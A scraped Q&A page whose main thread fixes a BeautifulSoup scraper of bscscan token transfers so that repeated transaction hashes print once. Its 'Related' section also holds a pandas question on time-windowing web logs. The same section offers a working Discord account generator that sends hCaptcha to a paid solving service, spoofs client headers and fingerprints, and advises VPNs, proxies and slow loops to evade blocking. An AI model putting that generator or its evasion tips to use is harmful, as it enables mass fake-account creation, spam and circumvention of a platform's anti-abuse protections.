Formatting Python BeautifulSoup data and removing duplicate first-column values - python

I have the following snippet, which already works; however, I want to clean up the formatting a bit by removing the duplicated first-column values so that the output is more readable.
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup
import re, random, ctypes
import requests
from time import sleep
url = 'https://bscscan.com/tokentxns'

# Plain browser User-Agent strings; one is picked at random for each run.
user_agent_list = [
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
]


def format_transfer(txnhash, value, token):
    """Return one output line: hash, value and token separated by single spaces."""
    return str(txnhash) + " " + str(value) + " " + str(token)


def scrape_transfers(page_url, user_agent, timeout=10):
    """Download ``page_url`` and yield one tuple per data row of its first table.

    Each tuple is ``(txnhash, value, token, link)``: the stripped text of
    cells 1, 7 and 8 of the row, plus the absolute URL of the first ``<a>``
    in cell 8 (``None`` when that cell has no link).

    Raises:
        requests.HTTPError: the server answered with an error status.
        RuntimeError: the response contains no ``<table>`` element.
    """
    # urljoin is not among the file-level imports, so bring it in here.
    from urllib.parse import urljoin

    # The User-Agent must be passed via ``headers=``; the second positional
    # argument of requests.get() is ``params`` (the query string).
    response = requests.get(
        page_url, headers={'User-Agent': user_agent}, timeout=timeout
    )
    response.raise_for_status()

    soup = BeautifulSoup(response.content, 'html.parser')
    table = soup.find('table')
    if table is None:
        raise RuntimeError('no <table> found in the response from ' + page_url)

    # The first <tr> is skipped, as in the original loop over rows[1:].
    for row in table.find_all('tr')[1:]:
        tds = row.find_all('td')
        if len(tds) < 9:
            # Not a full data row; cells 1, 7 and 8 would not all exist.
            continue
        anchor = tds[8].find('a')
        href = anchor.get('href') if anchor is not None else None
        link = urljoin(page_url, href) if href else None
        yield tds[1].text.strip(), tds[7].text.strip(), tds[8].text.strip(), link


def main():
    """Fetch the page with a random User-Agent and print one line per row."""
    user_agent = random.choice(user_agent_list)
    for txnhash, value, token, _link in scrape_transfers(url, user_agent):
        print(format_transfer(txnhash, value, token))


if __name__ == '__main__':
    main()
Current Output:
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 899.885819768 TrusterCoin (TSC)
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 0.62679168 Wrapped BNB (WBNB)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 388,214,984,514.909719227 WoofCoin (WOOF)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 0.003 Wrapped BNB (WBNB)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 26.737674146727101117 Binance-Peg ... (BUSD)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 1.251364193609566793 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.03997685638568537 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.041171860015645402 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.089939749761843203 Wrapped BNB (WBNB)
Wanted Improvement:
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 899.885819768 TrusterCoin (TSC)
0.62679168 Wrapped BNB (WBNB)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 388,214,984,514.909719227 WoofCoin (WOOF)
0.003 Wrapped BNB (WBNB)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 26.737674146727101117 Binance-Peg ... (BUSD)
1.251364193609566793 Binance-Peg ... (ADA)
0.03997685638568537 Binance-Peg ... (ADA)
0.041171860015645402 Binance-Peg ... (ADA)
0.089939749761843203 Wrapped BNB (WBNB)

Try this:
from urllib.request import Request, urlopen,urljoin
from bs4 import BeautifulSoup
import re, random, ctypes
import requests
from time import sleep
url = 'https://bscscan.com/tokentxns'

# Plain browser User-Agent strings; one is picked at random for each run.
user_agent_list = [
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
]


def format_grouped(transfers, pad=True):
    """Yield one output line per transfer, showing each hash only once per group.

    Args:
        transfers: iterable of ``(txnhash, value, token)`` string tuples.
        pad: when true, rows that repeat the previous row's hash start with
            blanks of the same width as the hash so the value column stays
            aligned; when false, those rows start directly with the value.

    A row is treated as a repeat only when its hash equals the hash of the
    row immediately before it, so a hash that shows up again later is
    printed again instead of being attributed to another transaction.
    """
    previous = None
    for txnhash, value, token in transfers:
        if txnhash != previous:
            prefix = txnhash + " "
            previous = txnhash
        elif pad:
            prefix = " " * len(txnhash) + " "
        else:
            prefix = ""
        yield prefix + value + " " + token


def scrape_transfers(page_url, user_agent, timeout=10):
    """Download ``page_url`` and yield one tuple per data row of its first table.

    Each tuple is ``(txnhash, value, token, link)``: the stripped text of
    cells 1, 7 and 8 of the row, plus the absolute URL of the first ``<a>``
    in cell 8 (``None`` when that cell has no link).

    Raises:
        requests.HTTPError: the server answered with an error status.
        RuntimeError: the response contains no ``<table>`` element.
    """
    # urljoin is documented in urllib.parse; import it from there rather
    # than relying on the name being re-exported by urllib.request.
    from urllib.parse import urljoin

    # The User-Agent must be passed via ``headers=``; the second positional
    # argument of requests.get() is ``params`` (the query string).
    response = requests.get(
        page_url, headers={'User-Agent': user_agent}, timeout=timeout
    )
    response.raise_for_status()

    soup = BeautifulSoup(response.content, 'html.parser')
    table = soup.find('table')
    if table is None:
        raise RuntimeError('no <table> found in the response from ' + page_url)

    # The first <tr> is skipped, as in the original loop over rows[1:].
    for row in table.find_all('tr')[1:]:
        tds = row.find_all('td')
        if len(tds) < 9:
            # Not a full data row; cells 1, 7 and 8 would not all exist.
            continue
        anchor = tds[8].find('a')
        href = anchor.get('href') if anchor is not None else None
        link = urljoin(page_url, href) if href else None
        yield tds[1].text.strip(), tds[7].text.strip(), tds[8].text.strip(), link


def main():
    """Fetch the page with a random User-Agent and print the grouped rows."""
    user_agent = random.choice(user_agent_list)
    rows = scrape_transfers(url, user_agent)
    for line in format_grouped((h, v, t) for h, v, t, _link in rows):
        print(line)


if __name__ == '__main__':
    main()
The script keeps track of the txnhash it has already printed, so the hash is shown only on the first row of each transaction; the following rows of that transaction show just the value and the token.

Related

Receiving hcaptcha error from discord while using 2captcha (works - working code pasted below)

from twocaptcha import TwoCaptcha
import json
import requests
import random
def rand(list):
return random.randrange(0, len(list))
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'
]
headers = {
'user-agent': user_agents[rand(user_agents)],
"accept": "*/*",
"authority": "discord.com",
"method": "POST",
"path": "/api/v9/auth/register",
"scheme": "https",
"origin": "discord.com",
"referer": "discord.com/register",
"x-debug-options": "bugReporterEnabled",
"accept-language": "en-US,en;q=0.9",
"connection": "keep-alive",
"content-Type": "application/json",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjIwMDAiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTA0OTY3LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin"
}
solver = TwoCaptcha('redacted')
try:
result = solver.hcaptcha(
sitekey='4c672d35-0701-42b2-88c3-78380b0db560',
url='https://discord.com/register',
)
except Exception as e:
sys.exit(e)
else:
print(result['code'])
def getfingerprint():
request_url = "https://discord.com/api/v9/experiments?with_guild_experiments=true"
r = requests.get(request_url , headers = {
"user-agent": user_agents[rand(user_agents)],
"x-context-properties": "eyJsb2NhdGlvbiI6Ii9jaGFubmVscy9AbWUifQ==",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNS4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTA1LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjE0NTQyOSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
})
if r.status_code == 200:
fingerprint = json.loads(r.text)["fingerprint"]
print(fingerprint)
else:
return r.text
payload = {
'captcha_key': result['code'],
'consent': True,
'date_of_birth': '2001-11-19',
'email': 'enter email',
'fingerprint': getfingerprint(),
'gift_code_sku_id': None,
'invite': None,
'password': 'enter username',
'username': 'enter password'
}
def register():
data = payload
res = requests.post('https://discord.com/api/v9/auth/register', headers = headers, json = data)
print('Token: ' + res.text)
if __name__ == '__main__':
register()
Code now works and generates accounts
just have to enter your own emails, username and password
can tell when it works cuz it outputs a token
if you get an error mentioning invalid hcaptcha response change email and use a vpn and try again
if you do decide to loop this have it loop slowly or setup proxies

Create batches of pandas dataframe based on timestamp

I have a dataframe of the following form:
#timestamp ISP cache_result client_ip client_request_host client_request_method client_ua client_url client_user content_type ... http_response_code major os os_name querystring reply_length_bytes ts_process_time ts_timestamp type ua_name
2018-04-17T08:12:32.000Z cuaerH c rt,nlEIrnii.cec TCP_REFRESH_MISS 25.204.184.124 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=2.2.3 25204 321 17/Apr/2018:08:12:32 -0000 testdata Chrome
2018-04-17T08:12:32.000Z HeE iclirueIc rat,nrncc. TCP_REFRESH_MISS 8.157.89.174 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/plugins/fusion-core/js/min/avada-p... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 2825 177 17/Apr/2018:08:12:32 -0000 testdata Chrome
2018-04-17T08:12:33.000Z ,rrnI EnH.ceeiuclcicrat TCP_REFRESH_MISS 37.151.22.36 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 267 275 17/Apr/2018:08:12:33 -0000 testdata Chrome
2018-04-17T08:12:34.000Z tn.cHer uE,lecnir aircIc TCP_REFRESH_MISS 202.165.110.43 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 341 172 17/Apr/2018:08:12:34 -0000 testdata Chrome
2018-04-17T08:12:34.000Z rneecHuraci ctInir cl.,E TCP_REFRESH_MISS 174.201.44.32 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/plugins/fusion-builder/assets/js/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 302 180 17/Apr/2018:08:12:34 -0000 testdata Chrome
Is it possible to somehow split it into 2-minute intervals? For example, a function that takes the whole dataframe and returns a df with the rows of the first 2 minutes; when called again, it returns the df with the rows of the next 2 minutes, and so on.
EDIT: A larger portion of my data is the following:
{"#timestamp":"2018-04-17T08:12:32.000Z","ISP":"cuaerH c rt,nlEIrnii.cec","cache_result":"TCP_REFRESH_MISS","client_ip":"25.204.184.124","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.ilightbox.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ecftdl1e","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=2.2.3","reply_length_bytes":25204,"ts_process_time":321,"ts_timestamp":"17\/Apr\/2018:08:12:32 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:32.000Z","ISP":"HeE iclirueIc rat,nrncc.","cache_result":"TCP_REFRESH_MISS","client_ip":"8.157.89.174","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-core\/js\/min\/avada-portfolio.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ced1tlef","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":2825,"ts_process_time":177,"ts_timestamp":"17\/Apr\/2018:08:12:32 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:33.000Z","ISP":" ,rrnI EnH.ceeiuclcicrat","cache_result":"TCP_REFRESH_MISS","client_ip":"37.151.22.36","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-waypoints.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"lde1ftce","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":267,"ts_process_time":275,"ts_timestamp":"17\/Apr\/2018:08:12:33 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:34.000Z","ISP":"tn.cHer uE,lecnir aircIc","cache_result":"TCP_REFRESH_MISS","client_ip":"202.165.110.43","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.requestAnimationFrame.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cl1etefd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":341,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:34 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:34.000Z","ISP":"rneecHuraci ctInir cl.,E","cache_result":"TCP_REFRESH_MISS","client_ip":"174.201.44.32","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-countdown.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ctl1fdee","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":302,"ts_process_time":180,"ts_timestamp":"17\/Apr\/2018:08:12:34 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:35.000Z","ISP":"ri enuaHccecrcnl,.tir EI","cache_result":"TCP_REFRESH_MISS","client_ip":"170.122.151.169","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-flip-boxes.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cl1feted","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":376,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:35 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:36.000Z","ISP":"earr ec,ulIriccnH.ci ntE","cache_result":"TCP_REFRESH_MISS","client_ip":"177.120.159.58","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.appear.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"t1lceedf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":1331,"ts_process_time":179,"ts_timestamp":"17\/Apr\/2018:08:12:36 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:36.000Z","ISP":"a, uEr.cnIlHeictrecrcni ","cache_result":"TCP_REFRESH_MISS","client_ip":"94.247.12.106","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-tabs.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"fetel1dc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":1154,"ts_process_time":86,"ts_timestamp":"17\/Apr\/2018:08:12:36 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:37.000Z","ISP":"rlcEt.icree ncaI uHi,crn","cache_result":"TCP_REFRESH_MISS","client_ip":"149.218.159.35","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.hoverintent.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"lecte1df","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":463,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:37 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:38.000Z","ISP":"e,ir ctuE iccnanrceIHlr.","cache_result":"TCP_REFRESH_MISS","client_ip":"138.228.110.199","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.cycle.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"e1ftlecd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=3.0.3","reply_length_bytes":7523,"ts_process_time":179,"ts_timestamp":"17\/Apr\/2018:08:12:38 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:39.000Z","ISP":"nirEei,latnu.cr cIH recc","cache_result":"TCP_REFRESH_MISS","client_ip":"117.81.45.92","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.placeholder.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cte1efdl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=2.0.7","reply_length_bytes":874,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:39 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:39.000Z","ISP":"Eic,e rlHccacrnuntI .rie","cache_result":"TCP_REFRESH_MISS","client_ip":"62.189.164.148","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-tooltip.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"fe1eltdc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":452,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:39 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:40.000Z","ISP":"It.crue,lare rHiic cncnE","cache_result":"TCP_REFRESH_MISS","client_ip":"136.44.153.177","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-ie1011.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"1dcetlef","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":526,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:40 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:41.000Z","ISP":"nIr,erecluiiHac cr.Ec nt","cache_result":"TCP_REFRESH_MISS","client_ip":"228.104.233.205","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/library\/bootstrap.scrollspy.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ec1edltf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=3.3.2","reply_length_bytes":1060,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:41 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:42.000Z","ISP":"lrne,tEcuc eircIHc.air n","cache_result":"TCP_REFRESH_MISS","client_ip":"168.41.158.162","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/library\/jquery.sticky-kit.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"d1efctle","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.2","reply_length_bytes":1208,"ts_process_time":185,"ts_timestamp":"17\/Apr\/2018:08:12:42 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:27.000Z","ISP":".cccti a neuleEc,rriHnrI","cache_result":"TCP_REFRESH_MISS","client_ip":"113.202.240.119","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/revslider\/public\/assets\/js\/jquery.themepunch.tools.min.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"d1eflcet","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.7","reply_length_bytes":38335,"ts_process_time":313,"ts_timestamp":"17\/Apr\/2018:08:12:27 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:28.000Z","ISP":"lnniueeiIH.ca rtrc ,ccEr","cache_result":"TCP_REFRESH_HIT","client_ip":"190.220.94.243","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2017\/10\/viettan.png","client_user":"-","content_type":"image\/png","device":"Other","dnet":"delcfet1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":1549,"ts_process_time":170,"ts_timestamp":"17\/Apr\/2018:08:12:28 -0000","type":"testdata","ua_name":"Chrome"}
